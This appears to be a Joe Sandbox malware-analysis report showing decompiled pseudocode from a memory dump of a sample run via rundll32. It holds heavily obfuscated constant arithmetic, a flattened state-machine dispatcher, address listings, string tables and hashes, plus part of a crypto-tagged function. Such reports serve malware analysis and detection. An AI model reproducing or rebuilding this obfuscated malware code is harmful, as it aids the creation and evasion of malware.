				_v244 = _v244 + 0x7839;
				_t884 = 0x61;
				_v244 = _v244 / _t884;
				_v244 = _v244 ^ 0x00002a4b;
				_v64 = 0x224c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x0022569d;
				_v28 = 0x6aaa;
				_v28 = _v28 + 0xf895;
				_v28 = _v28 ^ 0x0001180b;
				_v32 = 0xcf2a;
				_v32 = _v32 >> 5;
				_v32 = _v32 ^ 0x000078e8;
				_v144 = 0x27d7;
				_t885 = 0x31;
				_v144 = _v144 * 0x4c;
				_v144 = _v144 * 0x6f;
				_v144 = _v144 ^ 0x0520d70d;
				_v68 = 0xe124;
				_v68 = _v68 | 0x6e32588f;
				_v68 = _v68 ^ 0x6e32ff55;
				_v76 = 0x2dd5;
				_v76 = _v76 / _t885;
				_v76 = _v76 ^ 0x00005f83;
				_v128 = 0x69c1;
				_v128 = _v128 << 0xc;
				_v128 = _v128 + 0x18cb;
				_v128 = _v128 ^ 0x069c30c6;
				_v84 = 0x685f;
				_v84 = _v84 << 0xc;
				_v84 = _v84 ^ 0x0685e5c1;
				_v92 = 0x2705;
				_v92 = _v92 | 0x69949ce5;
				_v92 = _v92 ^ 0x6994dc6c;
				_v120 = 0xc01;
				_v120 = _v120 << 9;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x000073ca;
				_v60 = 0x272a;
				_v60 = _v60 >> 0xe;
				_v60 = _v60 ^ 0x0000747c;
				_v72 = 0x4038;
				_v72 = _v72 ^ 0x7ebb9374;
				_v72 = _v72 ^ 0x7ebbeb7f;
				_v268 = 0x21e6;
				_v268 = _v268 ^ 0x855290ef;
				_v268 = _v268 + 0xffff2fcc;
				_v268 = _v268 << 0xa;
				_v268 = _v268 ^ 0x47834e4c;
				_v40 = 0x51d;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x000068bf;
				_v276 = 0x64c3;
				_t886 = 0x56;
				_v276 = _v276 * 0x26;
				_v276 = _v276 | 0x794a73c0;
				_v276 = _v276 / _t886;
				_v276 = _v276 ^ 0x01693117;
				_v284 = 0x36ef;
				_v284 = _v284 + 0x3a04;
				_v284 = _v284 | 0xbe2b26e1;
				_v284 = _v284 + 0xfffff45e;
				_v284 = _v284 ^ 0xbe2b7ee9;
				_v204 = 0x454e;
				_v204 = _v204 + 0xffff7785;
				_v204 = _v204 >> 0xc;
				_v204 = _v204 ^ 0x000fd798;
				_v108 = 0x47c3;
				_t887 = 0x2f;
				_v108 = _v108 * 0x71;
				_v108 = _v108 ^ 0x001fdfd6;
				_v124 = 0xb7e5;
				_v124 = _v124 + 0xffffcb4c;
				_v124 = _v124 * 0x68;
				_v124 = _v124 ^ 0x00354302;
				_v88 = 0x235d;
				_v88 = _v88 + 0xffff8c3e;
				_v88 = _v88 ^ 0xffffcd48;
				_v240 = 0xfd07;
				_v240 = _v240 >> 4;
				_v240 = _v240 / _t887;
				_t888 = 0x1b;
				_v240 = _v240 * 0x58;
				_v240 = _v240 ^ 0x00004d40;
				_v116 = 0x52d5;
				_v116 = _v116 + 0x60e6;
				_v116 = _v116 * 0x53;
				_v116 = _v116 ^ 0x003a50ef;
				_v180 = 0x27ce;
				_v180 = _v180 * 0x69;
				_v180 = _v180 + 0x9fd3;
				_v180 = _v180 ^ 0x0010bdc5;
				_v48 = 0xf6a0;
				_v48 = _v48 / _t888;
				_v48 = _v48 ^ 0x000033dc;
				_v272 = 0x58a3;
				_v272 = _v272 << 0xb;
				_v272 = _v272 | 0xd69fa64e;
				_t889 = 0x61;
				_v272 = _v272 * 0x58;
				_v272 = _v272 ^ 0xdce90924;
				_v172 = 0x7e37;
				_v172 = _v172 / _t889;
				_t890 = 9;
				_v172 = _v172 / _t890;
				_v172 = _v172 ^ 0x00005630;
				_v24 = 0xf615;
				_v24 = _v24 + 0xffff71a4;
				_v24 = _v24 ^ 0x0000587e;
				_v140 = 0xbab0;
				_v140 = _v140 + 0x3358;
				_v140 = _v140 * 0x1e;
				_v140 = _v140 ^ 0x001bfc19;
				_v296 = 0x98c3;
				_v296 = _v296 >> 0xe;
				_v296 = _v296 << 0xf;
				_v296 = _v296 + 0xffffe6b8;
				_v296 = _v296 ^ 0x0000bcda;
				_v300 = 0xd4d5;
				_v300 = _v300 | 0x09eeb1ab;
				_v300 = _v300 << 6;
				_v300 = _v300 ^ 0xab71b752;
				_v300 = _v300 ^ 0xd0ccf59d;
				_v248 = 0x9309;
				_v248 = _v248 >> 0xa;
				_t891 = 0x24;
				_v248 = _v248 / _t891;
				_t444 =  &_v248; // 0x7839
				_t892 = 0x3a;
				_v248 =  *_t444 * 0x15;
				_v248 = _v248 ^ 0x000024c1;
				_v228 = 0x1ab1;
				_v228 = _v228 / _t892;
				_v228 = _v228 ^ 0x40c67f86;
				_t893 = 0x2b;
				_v228 = _v228 * 0x44;
				_v228 = _v228 ^ 0x34b9c14e;
				_v136 = 0x2bd4;
				_v136 = _v136 * 0x32;
				_v136 = _v136 + 0x4edc;
				_v136 = _v136 ^ 0x0008bcab;
				_v104 = 0xcc10;
				_v104 = _v104 | 0x4d8cf12d;
				_v104 = _v104 ^ 0x4d8cbfc4;
				_v236 = 0xa7;
				_v236 = _v236 | 0x5ad4fef6;
				_v236 = _v236 + 0xffffd4d8;
				_v236 = _v236 + 0xd6d4;
				_v236 = _v236 ^ 0x5ad5d136;
				_v56 = 0x5606;
				_v56 = _v56 / _t893;
				_v56 = _v56 ^ 0x00005df2;
				_v212 = 0x799b;
				_v212 = _v212 | 0x588104aa;
				_t894 = 0x33;
				_v212 = _v212 / _t894;
				_v212 = _v212 ^ 0x01bc6b6f;
				_v292 = 0x67de;
				_v292 = _v292 + 0x20cd;
				_t895 = 0x2a;
				_v292 = _v292 * 0x2a;
				_v292 = _v292 ^ 0xa1605a45;
				_v292 = _v292 ^ 0xa1762f75;
				_v164 = 0xc571;
				_v164 = _v164 >> 1;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x0000686b;
				_v80 = 0xad1b;
				_v80 = _v80 ^ 0x855e7d08;
				_v80 = _v80 ^ 0x855ead16;
				_v232 = 0x15a0;
				_v232 = _v232 * 0x58;
				_v232 = _v232 | 0xcb88fba0;
				_v232 = _v232 ^ 0xb8369652;
				_v232 = _v232 ^ 0x73b975c2;
				_v216 = 0x5e8a;
				_v216 = _v216 | 0xda374bd0;
				_v216 = _v216 ^ 0x4d4d4516;
				_v216 = _v216 ^ 0x977a2004;
				_v264 = 0x5872;
				_v264 = _v264 >> 0xe;
				_v264 = _v264 / _t895;
				_v264 = _v264 | 0x91c5ad7a;
				_v264 = _v264 ^ 0x91c5d95c;
				_v200 = 0x4938;
				_v200 = _v200 + 0xe8da;
				_t896 = 0x6e;
				_v200 = _v200 / _t896;
				_v200 = _v200 ^ 0x00006631;
				_v36 = 0xd627;
				_v36 = _v36 + 0x25d6;
				_v36 = _v36 ^ 0x0000aaed;
				_v220 = 0xdf41;
				_v220 = _v220 ^ 0x91b73bb2;
				_v220 = _v220 + 0x6473;
				_v220 = _v220 ^ 0x91b83c13;
				_v44 = 0x2c1a;
				_t897 = 0x68;
				_v44 = _v44 / _t897;
				_v44 = _v44 ^ 0x000011ca;
				_v52 = 0x6b36;
				_v52 = _v52 | 0x11eac64c;
				_v52 = _v52 ^ 0x11eaf934;
				_t898 = _v12;
				while(1) {
					L1:
					_t860 = 0x12445ff0;
					while(1) {
						_t912 = _t899 - _t860;
						if(_t912 <= 0) {
						}
						L3:
						if(_t912 == 0) {
							_push(_v284);
							_t760 = E001BBC7B(_v208, _v8, _v72, _a36, _v268, _a8, _v40, _t796, _v276);
							_t907 = _t907 - 0xc + 0x2c;
							_v304 = _t760;
							__eflags = _t760;
							_t899 =  !=  ? 0x74dd101 : 0x11d261d8;
							L13:
							_t796 = _v308;
							goto L1;
						}
						if(_t899 == 0xd59b4e) {
							E001A87CC(_v212, _v292, _t898, _v164, _v80);
							_t907 = _t907 + 0xc;
							L20:
							_t899 = 0xedec84c;
							L12:
							_t760 = _v304;
							goto L13;
						}
						if(_t899 == 0x74dd101) {
							__eflags = _t794;
							if(__eflags != 0) {
								_push(_v124);
								_push(_v108);
								_t796 = E001A5EBA(_v204, 0x1001f950, __eflags);
								_v308 = _t796;
							}
							_t770 = _v156 | _v256 | _v280 | _v196 | _v132 | _v188 | _v148 | _v20 | _v96;
							0x1a0400(_a16, _v240, _v116, _v180, _t770, _t796, _v304, _v48);
							_t898 = _t770;
							_t801 = _v272;
							E001AED35(_v272, _v308, _v172, _v24);
							_t907 = _t907 - 0xc + 0x34;
							__eflags = _t898;
							if(__eflags == 0) {
								goto L20;
							} else {
								_v4 = 1;
								_t775 = E001B9626(_v140, _t898,  &_v4, _v296, _t801, _v300, _v248);
								_t907 = _t907 + 0x18;
								_v4 = _t775;
								_t899 = 0x36a336ee;
								goto L12;
							}
						}
						if(_t899 == 0x7ded751) {
							__eflags = E001BC3BD(_t898, _v112, __eflags) - _v288;
							_t899 =  ==  ? 0x33a6c6f4 : 0xd59b4e;
							goto L12;
						}
						if(_t899 == 0xedec84c) {
							E001A87CC(_v232, _v216, _t760, _v264, _v200);
							_t907 = _t907 + 0xc;
							_t899 = 0x11d261d8;
							goto L12;
						}
						if(_t899 != 0x11d261d8) {
							L42:
							__eflags = _t899 - 0x2420cac1;
							if(__eflags == 0) {
								L10:
								return _t905;
							}
							while(1) {
								_t912 = _t899 - _t860;
								if(_t912 <= 0) {
								}
								goto L22;
							}
							goto L3;
						}
						E001A87CC(_v36, _v220, _v8, _v44, _v52);
						goto L10;
						L22:
						__eflags = _t899 - 0x2c2f6692;
						if(_t899 == 0x2c2f6692) {
							_t755 = E001B40EF(_t796, _v68, _v76, _t796, _v128, _v16, _v84, _t796, _v92, _v100);
							__eflags = _t755;
							_v8 = _t755;
							_t899 =  !=  ? 0x12445ff0 : 0x2420cac1;
							E001AE380(_v120, _v16, _v60);
							_t796 = _v308;
							_t907 = _t907 + 0x24;
							_t860 = 0x12445ff0;
							goto L42;
						}
						__eflags = _t899 - 0x31bced90;
						if(__eflags == 0) {
							_t899 = 0x3a24194a;
							continue;
						}
						__eflags = _t899 - 0x33a6c6f4;
						if(_t899 == 0x33a6c6f4) {
							__eflags = E001AFB05(_t898, _a20);
							_t899 = 0xd59b4e;
							_t783 = 1;
							_t905 =  !=  ? _t783 : _t905;
							goto L12;
						}
						__eflags = _t899 - 0x36a336ee;
						if(_t899 == 0x36a336ee) {
							__eflags = _t794;
							if(_t794 == 0) {
								_t810 = 0;
								__eflags = 0;
							} else {
								_t810 =  *_t794;
							}
							__eflags = _t794;
							if(__eflags == 0) {
								_t784 = 0;
								__eflags = 0;
							} else {
								_t784 =  *((intOrPtr*)(_t794 + 4));
							}
							0x1a04d6(_v104, _v236, _t784, _t810, _t810, _a40, _v56, _t898);
							_t907 = _t907 + 0x20;
							asm("sbb esi, esi");
							_t899 = (_t899 & 0x07093c03) + 0xd59b4e;
							goto L12;
						}
						__eflags = _t899 - 0x3a24194a;
						if(_t899 != 0x3a24194a) {
							goto L42;
						}
						_push(0x200);
						_push(0x200);
						_v12 = 0x200;
						_t790 = E001B922B(0x200);
						_t902 = _t790;
						_t907 = _t907 + 0xc;
						__eflags = _t790;
						if(__eflags != 0) {
							_push(0x200);
							_t813 = _v168;
							_t791 = E001AFFA4(_v168,  &_v12, _v252, _v176, _t902);
							_t907 = _t907 + 0x10;
							__eflags = _t791;
							if(_t791 == 0) {
								_t793 = E001B4460(_v152, _t902, _v244, _v160, _t813, _t813, _v64, _v28);
								_t907 = _t907 + 0x18;
								_v16 = _t793;
							}
							E001AE380(_v32, _t902, _v144);
						}
						_t899 = 0x2c2f6692;
						goto L12;
					}
				}
			}

0x001ba5ad
0x001ba5b7
0x001ba5c1
0x001ba5c2
0x001ba5c3
0x001ba5ca
0x001ba5d1
0x001ba5d8
0x001ba5df
0x001ba5e6
0x001ba5ed
0x001ba5f4
0x001ba5f5
0x001ba5f6
0x001ba5fb
0x001ba5fd
0x001ba600
0x001ba609
0x001ba614
0x001ba616
0x001ba61e
0x001ba623
0x001ba62e
0x001ba639
0x001ba644
0x001ba659
0x001ba65c
0x001ba663
0x001ba66a
0x001ba675
0x001ba67d
0x001ba68a
0x001ba68e
0x001ba692
0x001ba69a
0x001ba6a2
0x001ba6b8
0x001ba6bf
0x001ba6ca
0x001ba6dd
0x001ba6de
0x001ba6e5
0x001ba6f0
0x001ba6fb
0x001ba706
0x001ba711
0x001ba71c
0x001ba727
0x001ba732
0x001ba73d
0x001ba748
0x001ba753
0x001ba75e
0x001ba766
0x001ba771
0x001ba785
0x001ba78c
0x001ba794
0x001ba79f
0x001ba7a7
0x001ba7af
0x001ba7b7
0x001ba7bf
0x001ba7c7
0x001ba7cf
0x001ba7d6
0x001ba7e2
0x001ba7e5
0x001ba7e9
0x001ba7f1
0x001ba7fc
0x001ba807
0x001ba812
0x001ba81d
0x001ba828
0x001ba830
0x001ba83b
0x001ba843
0x001ba853
0x001ba857
0x001ba85f
0x001ba86a
0x001ba872
0x001ba87d
0x001ba888
0x001ba89a
0x001ba89f
0x001ba8a8
0x001ba8b3
0x001ba8be
0x001ba8c6
0x001ba8ce
0x001ba8d6
0x001ba8de
0x001ba8e6
0x001ba8f0
0x001ba8f3
0x001ba8f7
0x001ba8ff
0x001ba907
0x001ba91a
0x001ba921
0x001ba929
0x001ba934
0x001ba93c
0x001ba944
0x001ba94c
0x001ba954
0x001ba95c
0x001ba972
0x001ba979
0x001ba981
0x001ba98c
0x001ba99f
0x001ba9a2
0x001ba9b4
0x001ba9bb
0x001ba9c6
0x001ba9d2
0x001ba9d5
0x001ba9d9
0x001ba9e9
0x001ba9ee
0x001ba9f4
0x001ba9fc
0x001baa07
0x001baa0f
0x001baa1a
0x001baa25
0x001baa30
0x001baa3b
0x001baa46
0x001baa4e
0x001baa59
0x001baa6c
0x001baa6f
0x001baa7e
0x001baa85
0x001baa90
0x001baa9b
0x001baaa6
0x001baab1
0x001baac7
0x001baace
0x001baad9
0x001baae4
0x001baaec
0x001baaf7
0x001bab02
0x001bab0d
0x001bab15
0x001bab20
0x001bab2b
0x001bab36
0x001bab41
0x001bab4c
0x001bab54
0x001bab5c
0x001bab67
0x001bab72
0x001bab7a
0x001bab85
0x001bab90
0x001bab9b
0x001baba6
0x001babae
0x001babb6
0x001babbe
0x001babc3
0x001babcb
0x001babd6
0x001babde
0x001babe9
0x001babf6
0x001babf7
0x001babfb
0x001bac09
0x001bac0d
0x001bac15
0x001bac1d
0x001bac25
0x001bac2d
0x001bac35
0x001bac3d
0x001bac45
0x001bac4d
0x001bac52
0x001bac5a
0x001bac71
0x001bac74
0x001bac7b
0x001bac86
0x001bac91
0x001baca4
0x001bacab
0x001bacb6
0x001bacc1
0x001baccc
0x001bacd7
0x001bacdf
0x001bacec
0x001bacf5
0x001bacf8
0x001bacfc
0x001bad04
0x001bad0f
0x001bad22
0x001bad29
0x001bad34
0x001bad47
0x001bad4e
0x001bad59
0x001bad64
0x001bad7a
0x001bad81
0x001bad8c
0x001bad94
0x001bad99
0x001bada6
0x001bada9
0x001badad
0x001badb5
0x001badcb
0x001badd9
0x001baddc
0x001bade3
0x001badee
0x001badf9
0x001bae04
0x001bae0f
0x001bae1a
0x001bae2d
0x001bae34
0x001bae3f
0x001bae47
0x001bae4c
0x001bae51
0x001bae59
0x001bae61
0x001bae69
0x001bae71
0x001bae76
0x001bae7e
0x001bae86
0x001bae8e
0x001bae9b
0x001baea0
0x001baea6
0x001baeab
0x001baeae
0x001baeb2
0x001baeba
0x001baeca
0x001baece
0x001baedb
0x001baede
0x001baee2
0x001baeea
0x001baefd
0x001baf04
0x001baf0f
0x001baf1a
0x001baf25
0x001baf30
0x001baf3b
0x001baf43
0x001baf4b
0x001baf53
0x001baf5b
0x001baf63
0x001baf79
0x001baf80
0x001baf8b
0x001baf93
0x001baf9f
0x001bafa4
0x001bafaa
0x001bafb2
0x001bafba
0x001bafc7
0x001bafc8
0x001bafcc
0x001bafd4
0x001bafdc
0x001bafe7
0x001bafee
0x001baff6
0x001bb001
0x001bb00c
0x001bb017
0x001bb022
0x001bb02f
0x001bb033
0x001bb03b
0x001bb043
0x001bb04b
0x001bb053
0x001bb05b
0x001bb063
0x001bb06b
0x001bb073
0x001bb07e
0x001bb082
0x001bb08c
0x001bb094
0x001bb09c
0x001bb0aa
0x001bb0af
0x001bb0b8
0x001bb0c3
0x001bb0ce
0x001bb0d9
0x001bb0e4
0x001bb0ec
0x001bb0f4
0x001bb0fc
0x001bb104
0x001bb116
0x001bb119
0x001bb120
0x001bb12f
0x001bb13a
0x001bb145
0x001bb150
0x001bb157
0x001bb157
0x001bb157
0x001bb15c
0x001bb15c
0x001bb15e
0x001bb15e
0x001bb164
0x001bb164
0x001bb347
0x001bb381
0x001bb386
0x001bb389
0x001bb38d
0x001bb399
0x001bb1f5
0x001bb1f5
0x00000000
0x001bb1f5
0x001bb170
0x001bb335
0x001bb33a
0x001bb33d
0x001bb33d
0x001bb1f1
0x001bb1f1
0x00000000
0x001bb1f1
0x001bb17c
0x001bb221
0x001bb223
0x001bb225
0x001bb231
0x001bb246
0x001bb248
0x001bb248
0x001bb27e
0x001bb2b5
0x001bb2c5
0x001bb2ce
0x001bb2d2
0x001bb2d7
0x001bb2da
0x001bb2dc
0x00000000
0x001bb2de
0x001bb2f5
0x001bb305
0x001bb30a
0x001bb30d
0x001bb314
0x00000000
0x001bb314
0x001bb2dc
0x001bb188
0x001bb215
0x001bb21c
0x00000000
0x001bb21c
0x001bb190
0x001bb1e4
0x001bb1e9
0x001bb1ec
0x00000000
0x001bb1ec
0x001bb198
0x001bb586
0x001bb586
0x001bb58c
0x001bb1c8
0x001bb1d2
0x001bb1d2
0x001bb15c
0x001bb15c
0x001bb15e
0x001bb15e
0x00000000
0x001bb15e
0x00000000
0x001bb15c
0x001bb1be
0x00000000
0x001bb3a1
0x001bb3a1
0x001bb3a7
0x001bb545
0x001bb558
0x001bb566
0x001bb572
0x001bb575
0x001bb57a
0x001bb57e
0x001bb581
0x00000000
0x001bb581
0x001bb3ad
0x001bb3b3
0x001bb508
0x00000000
0x001bb508
0x001bb3be
0x001bb3c0
0x001bb4f6
0x001bb4f8
0x001bb4ff
0x001bb500
0x00000000
0x001bb500
0x001bb3c6
0x001bb3cc
0x001bb48b
0x001bb48d
0x001bb493
0x001bb493
0x001bb48f
0x001bb48f
0x001bb48f
0x001bb495
0x001bb497
0x001bb49e
0x001bb49e
0x001bb499
0x001bb499
0x001bb499
0x001bb4cb
0x001bb4d0
0x001bb4d5
0x001bb4dd
0x00000000
0x001bb4dd
0x001bb3d2
0x001bb3d8
0x00000000
0x00000000
0x001bb3f9
0x001bb3fa
0x001bb3fc
0x001bb403
0x001bb408
0x001bb40a
0x001bb40d
0x001bb40f
0x001bb411
0x001bb425
0x001bb42c
0x001bb431
0x001bb434
0x001bb436
0x001bb45c
0x001bb461
0x001bb464
0x001bb464
0x001bb47b
0x001bb480
0x001bb481
0x00000000
0x001bb481
0x001bb15c

Strings

8@, xrefs: 001BAB85
(, xrefs: 001BA81D
~X, xrefs: 001BAE04
$, xrefs: 001BAA90
?N, xrefs: 001BA6CA
x, xrefs: 001BAA4E
6 %, xrefs: 001BA8D6
0V, xrefs: 001BADE3
kh, xrefs: 001BAFF6
L", xrefs: 001BA9FC
NE, xrefs: 001BAC3D
]#, xrefs: 001BACB6
|t, xrefs: 001BAB7A
1f, xrefs: 001BB0B8
6, xrefs: 001BAC15
K*, xrefs: 001BA9F4
9x, xrefs: 001BAEA6
6k, xrefs: 001BB12F
rX, xrefs: 001BB06B
P:, xrefs: 001BAD29
7~, xrefs: 001BADB5
X3, xrefs: 001BAE1A
@M, xrefs: 001BACFC
_h, xrefs: 001BAB02
/g, xrefs: 001BA6F0
8I, xrefs: 001BB094
sd, xrefs: 001BB0F4

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6 %$$$($/g$0V$1f$6k$7~$8@$8I$9x$?N$@M$K*$L"$NE$X3$]#$_h$kh$rX$sd$|t$~X$6$P:$x
API String ID: 0-2249525640
Opcode ID: 92e662ef6201567256f093b84bc13be4d86e7470e3081e96bb398d438ec3ee5f
Instruction ID: 74a6db26cc17c15fbe359cb873d155d87fa2e210351e762d55904c498eb3da37
Opcode Fuzzy Hash: 92e662ef6201567256f093b84bc13be4d86e7470e3081e96bb398d438ec3ee5f
Instruction Fuzzy Hash: 3582EE7150C3818BE378CF25C98AB9BBBE1BBD4314F10891DE5DA962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B2DE1, Relevance: 31.9, Strings: 25, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E001B2DE1(intOrPtr __ecx, void* __edx, intOrPtr _a8, intOrPtr* _a12) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr _v2820;
				intOrPtr _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				intOrPtr _v2848;
				char _v2852;
				signed int _v2856;
				signed int _v2860;
				intOrPtr _v2864;
				short _v2868;
				signed int _v2872;
				intOrPtr _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				signed int _v2944;
				signed int _v2948;
				signed int _v2952;
				signed int _v2956;
				signed int _v2960;
				signed int _v2964;
				signed int _v2968;
				signed int _v2972;
				signed int _v2976;
				signed int _v2980;
				signed int _v2984;
				signed int _v2988;
				signed int _v2992;
				signed int _v2996;
				signed int _v3000;
				signed int _v3004;
				signed int _v3008;
				signed int _v3012;
				signed int _v3016;
				signed int _v3020;
				signed int _v3024;
				signed int _v3028;
				signed int _v3032;
				signed int _v3036;
				signed int _v3040;
				signed int _v3044;
				signed int _v3048;
				signed int _v3052;
				unsigned int _v3056;
				signed int _v3060;
				signed int _v3064;
				signed int _v3068;
				signed int _v3072;
				signed int _v3076;
				signed int _v3080;
				signed int _v3084;
				signed int _v3088;
				signed int _v3092;
				signed int _v3096;
				signed int _v3100;
				signed int _v3104;
				signed int _v3108;
				signed int _v3112;
				signed int _v3116;
				signed int _v3120;
				signed int _v3124;
				signed int _v3128;
				signed int _v3132;
				signed int _v3136;
				signed int _v3140;
				signed int _v3144;
				signed int _v3148;
				signed int _v3152;
				signed int _v3156;
				intOrPtr _v3160;
				void* __edi;
				intOrPtr _t696;
				void* _t697;
				intOrPtr _t724;
				void* _t744;
				intOrPtr _t760;
				short _t763;
				short _t764;
				intOrPtr _t766;
				intOrPtr _t768;
				signed int _t773;
				signed int _t776;
				signed int _t778;
				signed int _t789;
				signed int _t792;
				short* _t839;
				short* _t840;
				intOrPtr _t841;
				signed int _t844;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				char _t855;
				void* _t859;
				void* _t860;
				void* _t863;
				void* _t864;

				_t838 = _a12;
				_push(_a12);
				_push(_a8);
				_t841 = __ecx;
				_push(1);
				_push(__edx);
				_push(__ecx);
				_v2876 = __ecx;
				E001AD571(1);
				_v2928 = 0xf006;
				_t859 =  &_v3160 + 0x14;
				_v2928 = _v2928 + 0xffff5e31;
				_v2928 = _v2928 ^ 0x00006d79;
				_t764 = 0;
				_v2888 = 0x597f;
				_t768 = 0x122826c5;
				_v2888 = _v2888 + 0xffffb247;
				_v2888 = _v2888 ^ 0x00007c36;
				_v2884 = 0x51d0;
				_v2884 = _v2884 ^ 0x8a9688d9;
				_v2884 = _v2884 ^ 0x8a96f946;
				_v3056 = 0xceaf;
				_v3056 = _v3056 + 0x1acd;
				_v3056 = _v3056 >> 7;
				_v3056 = _v3056 ^ 0x00006454;
				_v3048 = 0xceb3;
				_v3048 = _v3048 ^ 0x12175997;
				_v3048 = _v3048 | 0xf5c16a9f;
				_v3048 = _v3048 ^ 0xf7d78808;
				_v3148 = 0xe1f5;
				_v3148 = _v3148 ^ 0x25d59e8c;
				_v3148 = _v3148 >> 6;
				_v3148 = _v3148 | 0x248df7b4;
				_v3148 = _v3148 ^ 0x249ffb72;
				_v2908 = 0xc5d4;
				_t848 = 0x76;
				_v2868 = 0;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 ^ 0x003d5a71;
				_v3152 = 0x93e9;
				_v3152 = _v3152 * 6;
				_v3152 = _v3152 >> 0xb;
				_v3152 = _v3152 << 5;
				_v3152 = _v3152 ^ 0x00005fd5;
				_v2892 = 0x9ecc;
				_v2892 = _v2892 + 0xb107;
				_v2892 = _v2892 ^ 0x00016d04;
				_v3128 = 0x2d62;
				_v3128 = _v3128 + 0xf3e9;
				_v3128 = _v3128 + 0xffff0590;
				_v3128 = _v3128 << 0x10;
				_v3128 = _v3128 ^ 0x26db5ed9;
				_v3136 = 0xddca;
				_v3136 = _v3136 / _t848;
				_v3136 = _v3136 | 0x0268d28b;
				_v3136 = _v3136 ^ 0x8c667b72;
				_v3136 = _v3136 ^ 0x8e0e8619;
				_v3144 = 0xbece;
				_v3144 = _v3144 << 0x10;
				_v3144 = _v3144 + 0xffffac2b;
				_v3144 = _v3144 | 0x2bf18190;
				_v3144 = _v3144 ^ 0xbffde376;
				_v3072 = 0x3148;
				_v3072 = _v3072 << 2;
				_v3072 = _v3072 + 0xffff8f4a;
				_v3072 = _v3072 + 0xffffdf48;
				_v3072 = _v3072 ^ 0x000051d3;
				_v2932 = 0xc7a4;
				_v2932 = _v2932 + 0xffffc500;
				_v2932 = _v2932 ^ 0x0000b74d;
				_v2948 = 0xf96a;
				_v2948 = _v2948 ^ 0xb2071267;
				_v2948 = _v2948 ^ 0xb207f6fd;
				_v3060 = 0x6490;
				_v3060 = _v3060 | 0x8d698005;
				_v3060 = _v3060 << 9;
				_v3060 = _v3060 ^ 0xd3c9090c;
				_v3040 = 0xf19b;
				_t849 = 0x62;
				_v3040 = _v3040 * 6;
				_v3040 = _v3040 >> 8;
				_v3040 = _v3040 ^ 0x00006fb8;
				_v3064 = 0xab2e;
				_v3064 = _v3064 | 0x54e1f507;
				_v3064 = _v3064 ^ 0xa19437d9;
				_v3064 = _v3064 ^ 0xf575a828;
				_v3116 = 0x8b86;
				_v3116 = _v3116 + 0x3c8d;
				_v3116 = _v3116 | 0x15278ec9;
				_v3116 = _v3116 * 0x24;
				_v3116 = _v3116 ^ 0xf999749d;
				_v2980 = 0xb15d;
				_v2980 = _v2980 * 0x1c;
				_v2980 = _v2980 * 0x4f;
				_v2980 = _v2980 ^ 0x05fce6e2;
				_v3012 = 0xe1c9;
				_v3012 = _v3012 / _t849;
				_v3012 = _v3012 << 2;
				_v3012 = _v3012 ^ 0x000008f2;
				_v3092 = 0xcdf8;
				_v3092 = _v3092 << 0xb;
				_v3092 = _v3092 | 0x7fef6ef7;
				_v3092 = _v3092 ^ 0x7fefb0be;
				_v3028 = 0xe773;
				_v3028 = _v3028 ^ 0xd4d35239;
				_v3028 = _v3028 + 0xd233;
				_v3028 = _v3028 ^ 0xd4d4a9ea;
				_v2972 = 0x9acc;
				_v2972 = _v2972 + 0xffff9d51;
				_v2972 = _v2972 + 0x2466;
				_v2972 = _v2972 ^ 0x00003d68;
				_v3132 = 0x7073;
				_v3132 = _v3132 | 0xfe02725f;
				_v3132 = _v3132 + 0x90ed;
				_v3132 = _v3132 * 0x5f;
				_v3132 = _v3132 ^ 0x431e27aa;
				_v3020 = 0x1ed6;
				_v3020 = _v3020 >> 7;
				_v3020 = _v3020 * 7;
				_v3020 = _v3020 ^ 0x00000b46;
				_v3076 = 0xf956;
				_v3076 = _v3076 << 6;
				_v3076 = _v3076 << 0xd;
				_v3076 = _v3076 >> 6;
				_v3076 = _v3076 ^ 0x032af4d4;
				_v3140 = 0xe0d7;
				_v3140 = _v3140 ^ 0xbc49f1ee;
				_v3140 = _v3140 | 0xbaff3cf7;
				_v3140 = _v3140 ^ 0xbeff3bd7;
				_v2900 = 0xcfb;
				_v2900 = _v2900 ^ 0xc36cce10;
				_v2900 = _v2900 ^ 0xc36cc7a7;
				_v3108 = 0xd734;
				_v3108 = _v3108 * 0x55;
				_v3108 = _v3108 + 0xffffc23f;
				_v3108 = _v3108 | 0xe0064d4c;
				_v3108 = _v3108 ^ 0xe047372a;
				_v2988 = 0x2d99;
				_v2988 = _v2988 | 0xf634325b;
				_v2988 = _v2988 << 3;
				_v2988 = _v2988 ^ 0xb1a18159;
				_v2956 = 0x8e49;
				_v2956 = _v2956 ^ 0x317adff0;
				_v2956 = _v2956 + 0xff71;
				_v2956 = _v2956 ^ 0x317b2f81;
				_v3100 = 0xe03d;
				_t850 = 6;
				_v3100 = _v3100 / _t850;
				_v3100 = _v3100 + 0x6786;
				_t851 = 0x5a;
				_v3100 = _v3100 / _t851;
				_v3100 = _v3100 ^ 0x00003632;
				_v2916 = 0xdbd8;
				_v2916 = _v2916 ^ 0xc47651f8;
				_v2916 = _v2916 ^ 0xc476dc33;
				_v3044 = 0x6386;
				_v3044 = _v3044 | 0xf7f7773f;
				_v3044 = _v3044 ^ 0xf7f72261;
				_v2896 = 0xeb08;
				_v2896 = _v2896 >> 0xf;
